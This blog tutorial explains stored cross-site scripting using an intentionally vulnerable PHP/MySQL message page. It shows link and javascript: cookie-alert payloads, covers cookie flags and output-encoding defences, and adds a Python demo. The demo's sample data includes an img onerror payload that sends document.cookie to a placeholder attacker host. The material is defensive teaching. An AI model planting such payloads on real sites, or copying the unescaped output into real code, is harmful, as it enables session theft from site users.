Tuesday, July 25, 2017

Stored Cross Site Scripting (XSS) with examples


This is the second part of the blog post "Reflected Cross Site Scripting (XSS) with examples". Stored XSS is the second way of performing an XSS attack on a website. As the name implies, a database is involved: user input is stored in it and later shown back to other users. An attacker uses an unsanitized text box or text area to plant the payload, and it runs in the browser of every user who later views the page, not just the one who submitted it.

Now let's see how stored XSS works with an example. For this you need a MySQL database (the screenshots below use phpMyAdmin).
All the necessary files are uploaded to GitHub:

 https://github.com/sajith01prasad/Stored-Cross-Site-Scripting-with-examples

First create a database called 'xss'. Inside it create a table called 'Messages' with two columns, Receiver and Message. Use VARCHAR as the data type for both.


Now open the MessageClient.html page. It has two links. Through the first link the sender can send a message to anyone he likes. Click on the first link.



Send a message To : Sam
Message: Hello Sam. How are you doing?





Now click the Send button.






Now go to phpMyAdmin and open the 'xss' database. It contains the "Messages" table; click on it.






You can see the Message we sent to Sam is stored in the database.


How does an attacker use this to perform a stored XSS attack? As you know, there are two hyperlinks on the "message client" home page. We used the first link to send a message. Now let's click on the second link, "Sent Messages". Once you click it you will be directed to a page like this.




Here, enter "Sam" and hit "view".


A simple SQL query retrieves all the messages that were sent to a given person, and the page prints them exactly as stored. Now let's see what happens when an attacker enters the following on the first page:

Receiver - Neville
Message - <a href="//google.com">Click me</a>








Now go to the second link and type Neville.






You can see a hyperlink "Click me" on the web page. Click on it: a legitimate user is sent to the Google home page. The stored text was never treated as a message at all; the browser parsed it as HTML.







An attacker can use this method to redirect every user of the website to his own malicious site. A redirect on its own only takes the victim elsewhere; the next example puts script into the page, where it runs on the vulnerable site's origin and can therefore read that site's cookies.


I will show you how to view the cookie values when the user clicks on the "Click me" hyperlink.
The procedure is the same: first the script is entered into the database; when the web page retrieves it and the user clicks on it, it executes.


Receiver -Kevin
Message - <a HREF="javascript:alert(document.cookie);">Click me</a>

Now go to MySQL and check whether the inputs are there.

Then go to the second link on the main page, where you can view sent messages.
There, give "Kevin" as the receiver's name.
As in the previous example you will see a "Click me" hyperlink on the web page. Click on that link.




The site I am hosting on localhost does not maintain a session and never sets a cookie in the browser, so I had to add one PHP line to the initial code. PHP's setcookie() takes its arguments positionally in the order name, value, expires, path, domain, secure, httponly, so the two flags discussed below are the sixth and seventh arguments:

 setcookie("localhost", "237637276377", 0, "/", "", false, false);

localhost is the name of the cookie.
237637276377 is the value of the cookie.
0 for expires makes it a session cookie, and / is the path, so the browser sends it with every request to the site.
The sixth parameter is the Secure flag. If it is true the browser only sends the cookie over a secured connection such as HTTPS. Since the localhost server is plain HTTP, the flag has to be false or the cookie would never be sent.
The last parameter is the HttpOnly flag. We are going to read this cookie from the client side using JavaScript. If the flag were true the cookie would still be sent with every request, but document.cookie would not expose it, so there would be no way for me to show you the cookie value in the alert. Therefore I set it to false. On a real site both flags should be true; HttpOnly is exactly what stops this kind of payload from reading the session cookie.


viewMessages.php






What if, instead of showing the cookie in an alert, the attacker's script sent these cookie values to a website he controls and stored them there? He could then present them to the vulnerable site and be treated as the legitimate users until the cookies expire.


The best place on a website to practice this attack is the comment section. If comments are not validated and encoded properly, every user who views the page is in danger. Comment sections are usually written so that they refresh every few seconds, which means the stored payload is fetched and rendered again and again for every viewer; the attacker can use this feature to make the attack far more effective.


How to prevent Stored XSS

  • Escaping special characters. 
XSS is prevented by encoding output: escaping the characters that have meaning in HTML (the less-than and greater-than signs, the ampersand and both kinds of quote) so that the browser treats the stored text as data rather than markup. This can be done before the user input goes into the database or when it is retrieved, but the safest place is the moment it is rendered, because the correct encoding depends on where the value lands (HTML body, attribute, JavaScript, URL) and encoding at storage time also corrupts the data for every other use. Once the characters are encoded, the markup in the payloads above is shown literally instead of being executed.


  • Built-in functions and open source libraries. 
PHP's built-in htmlspecialchars() with ENT_QUOTES does this encoding for the HTML body and attribute contexts, and is all the message page above needs. If the application must accept some HTML from users (rich-text comments), use a whitelist-based filter such as HTML Purifier rather than a blacklist of known-bad strings. Open source options include:
  1. PHP AntiXSS
  2. xss_clean.php filter
  3. HTML Purifier 
  4. xssproject
  5. XSS HTML Filter
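The following Python script is an added example, not part of the original post or its GitHub repository. It reproduces the flow of the walkthrough end to end: the three messages typed above are stored in a Messages table (an in-memory SQLite database stands in for MySQL), the view page is modelled once the way viewMessages.php is described (stored text pasted straight into the HTML) and once with output encoding at the sink, and an HTML parser reports which tags a browser would actually act on in each case. The fourth row is an assumed attacker payload that needs no click and sends document.cookie to a placeholder host (attacker.example); it is included to show that output encoding neutralises event-handler payloads as well as the javascript: links used above.

```python
import html
import sqlite3
from html.parser import HTMLParser

# Constructed sample rows. The first three are the messages typed in the walkthrough.
# The fourth is an assumed attacker payload (not from the post) that fires on page
# load, with no click, and sends document.cookie to a host the attacker controls;
# attacker.example is a placeholder name.
MESSAGES = [
    ("Sam", "Hello Sam. How are you doing?"),
    ("Neville", '<a href="//google.com">Click me</a>'),
    ("Kevin", '<a HREF="javascript:alert(document.cookie);">Click me</a>'),
    ("Kevin", '<img src=x onerror="new Image().src=\'//attacker.example/?c=\'+document.cookie">'),
]


def setup_db():
    """In-memory stand-in for the MySQL 'xss' database and its Messages table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Messages (Receiver VARCHAR(64), Message VARCHAR(1024))")
    conn.executemany("INSERT INTO Messages (Receiver, Message) VALUES (?, ?)", MESSAGES)
    return conn


def fetch_messages(conn, receiver):
    """The 'simple SQL query' behind the view page. It is parameterised, so the
    lookup itself is not injectable; the XSS happens later, at the HTML sink."""
    rows = conn.execute("SELECT Message FROM Messages WHERE Receiver = ?", (receiver,))
    return [row[0] for row in rows]


def render_vulnerable(conn, receiver):
    """What viewMessages.php does as described: stored text is pasted into the page."""
    return "".join(f"<p>{m}</p>" for m in fetch_messages(conn, receiver))


def render_hardened(conn, receiver):
    """Same page with output encoding at the HTML body sink. quote=True also
    encodes both kinds of quote, like PHP's htmlspecialchars($m, ENT_QUOTES)."""
    return "".join(f"<p>{html.escape(m, quote=True)}</p>" for m in fetch_messages(conn, receiver))


class _TagCollector(HTMLParser):
    """Collects the start tags a browser would parse out of a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def active_markup(fragment):
    """Tags in the rendered fragment other than the <p> wrapper the page itself emits.
    An empty list means the stored text reached the browser as data, not markup."""
    parser = _TagCollector()
    parser.feed(fragment)
    return [(tag, attrs) for tag, attrs in parser.tags if tag != "p"]


def demo(receiver="Kevin"):
    """Render one receiver's messages both ways and report what survives as markup."""
    conn = setup_db()
    vulnerable = render_vulnerable(conn, receiver)
    hardened = render_hardened(conn, receiver)
    return {
        "vulnerable_html": vulnerable,
        "hardened_html": hardened,
        "vulnerable_markup": active_markup(vulnerable),
        "hardened_markup": active_markup(hardened),
    }


if __name__ == "__main__":
    for name in ("Sam", "Neville", "Kevin"):
        result = demo(name)
        print(f"--- {name} ---")
        print("vulnerable:", result["vulnerable_html"])
        print("  markup the browser would act on:", result["vulnerable_markup"])
        print("hardened:  ", result["hardened_html"])
        print("  markup the browser would act on:", result["hardened_markup"])
```

For Kevin the vulnerable render yields an <a> with a javascript: href and an <img> with an onerror handler, which is exactly what the browser executes in the screenshots; the hardened render yields no tags at all and the payload text appears literally on the page. The encoding is applied in the renderer and not before the INSERT, so the database keeps the raw text and the same rows could still be emitted safely into a different context with the encoding that context needs.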
